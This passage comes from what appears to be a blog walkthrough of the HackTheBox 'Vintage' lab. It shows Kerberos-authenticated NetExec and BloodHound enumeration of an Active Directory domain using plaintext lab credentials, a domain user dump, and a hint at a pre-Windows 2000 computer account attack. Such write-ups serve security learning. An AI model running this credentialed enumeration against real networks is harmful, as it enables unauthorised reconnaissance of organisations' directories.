|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><p>Not many finger-print tho!!</p><ol start="2"><li><p><em>Assumed Breach Enumeration with NetExec</em></p></li></ol><p>After trying the credential, we know that this machine have strong Kerberos related, on NetExec you need to specify the -k flag so it can confirmed the authentication.</p><p>The good news is the Machine doesn&#8217;t have critical Clow-SKEW so fake-timing is not essential.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\P.Rosa:Rosaisbest123 
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\P.Rosa:Rosaisbest123</code></pre></div><p>And we got our domain and HOST:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">DC01 dc01.vintage.htb vintage.htb</code></pre></div><p>After some enumeration, there&#8217;s nothing interesting on the SMB shares so I just BloodHound with NetExec:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k --bloodhound -c all --dns-server 10.129.231.205
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01.vintage.htb 389    DC01             Resolved collection methods: localadmin, objectprops, dcom, rdp, acl, trusts, psremote, group, container, session
LDAP        dc01.vintage.htb 389    DC01             Using kerberos auth without ccache, getting TGT
LDAP        dc01.vintage.htb 389    DC01             Done in 1M 25S
LDAP        dc01.vintage.htb 389    DC01             Compressing output into /root/.nxc/logs/DC01_dc01.vintage.htb_2026-04-06_233035_bloodhound.zip</code></pre></div><p>Then I create a krb5 config files, and get bunch of users from the credential features:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k --users                                        
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01.vintage.htb 389    DC01             [*] Enumerated 14 domain users: vintage.htb
LDAP        dc01.vintage.htb 389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        dc01.vintage.htb 389    DC01             Administrator                 2024-06-08 07:34:54 0        Built-in account for administering the computer/domain      
LDAP        dc01.vintage.htb 389    DC01             Guest                         2024-11-13 09:16:53 1        Built-in account for guest access to the computer/domain    
LDAP        dc01.vintage.htb 389    DC01             krbtgt                        2024-06-05 06:27:35 0        Key Distribution Center Service Account                     
LDAP        dc01.vintage.htb 389    DC01             M.Rossi                       2024-06-05 09:31:08 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             R.Verdi                       2024-06-05 09:31:08 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             L.Bianchi                     2024-06-05 09:31:08 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             G.Viola                       2024-06-05 09:31:08 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             C.Neri                        2024-06-05 17:08:13 0                                                                    
LDAP        dc01.vintage.htb 389    DC01             P.Rosa                        2024-11-06 07:27:16 0                                                                    
LDAP        dc01.vintage.htb 389    DC01             svc_sql                       2026-04-06 23:32:04 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             svc_ldap                      2024-06-06 09:45:27 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             svc_ark                       2024-06-06 09:45:27 1                                                                    
LDAP        dc01.vintage.htb 389    DC01             C.Neri_adm                    2024-06-07 06:54:14 0                                                                    
LDAP        dc01.vintage.htb 389    DC01             L.Bianchi_adm                 2024-11-26 06:40:30 0</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -k --generate-krb5-file /etc/krb5.conf 
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] krb5 conf saved to: /etc/krb5.conf
SMB         dc01.vintage.htb 445    dc01             [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\P.Rosa:Rosaisbest123 
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo cat /etc/krb5.conf                                                                            
[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
        default_domain = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB</code></pre></div><p>For bit of information, some of the users have identical users with specified Admin name (could be extra access/rights)!!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat users.txt 
Administrator
Guest
krbtgt
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm</code></pre></div><p>On BloodHound, turns out I didn&#8217;t have any OOB, but I found another computers account, which potentially affect our NetExec collectors due to non-local DNS name:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MIIE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MIIE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!MIIE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!MIIE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!MIIE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MIIE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:304157,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6bf908de-86b4-4702-9441-ac6a8535dd73_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MIIE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!MIIE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!MIIE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!MIIE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3ae2f10c-1df8-473d-b9ef-2336f34d0ad7_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And now we got:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">FS01.vintage.htb FS01 vintage.htb</code></pre></div><p>And we saw PRE-2000 group which potentially being Pre2K Attack. Now let&#8217;s re-collect the Graph fix.</p><ol start="3"><li><p><em>Active Directory BloodHound (Part 01)</em></p></li></ol><p>Now I&#8217;ll use BloodHound-Python</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodhound-ce-python -u P.Rosa -p Rosaisbest123 -k -d vintage.htb -dc dc01.vintage.htb -ns 10.129.231.205 -c all --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: vintage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 16 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FS01.vintage.htb
INFO: Querying computer: dc01.vintage.htb
WARNING: Could not resolve: FS01.vintage.htb: The resolution lifetime expired after 3.102 seconds: Server Do53:10.129.231.205@53 answered The DNS operation timed out.
INFO: Done in 01M 22S
INFO: Compressing output into 20260406234346_bloodhound.zip</code></pre></div><p>Lets see the graph:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!YHaF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!YHaF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!YHaF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!YHaF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!YHaF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!YHaF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:107227,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!YHaF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!YHaF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!YHaF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!YHaF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F99581bae-7faf-456b-9adf-d023452aaab2_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>After collectors P.Rosa account still doesn&#8217;t have any OOB:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5OSZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5OSZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!5OSZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!5OSZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!5OSZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5OSZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:166452,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!5OSZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!5OSZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!5OSZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!5OSZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F230a8fe4-31cc-4750-8954-3d3ed9682c08_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But she is path of PRE-2000 Windows Group:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uOav!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uOav!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!uOav!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!uOav!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!uOav!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uOav!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:162783,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1eb19d29-4f93-4540-b9c6-ce2a854d891a_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uOav!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!uOav!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!uOav!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!uOav!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7f5f5ad6-b6a3-4e1c-89a8-7031309fc9a4_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 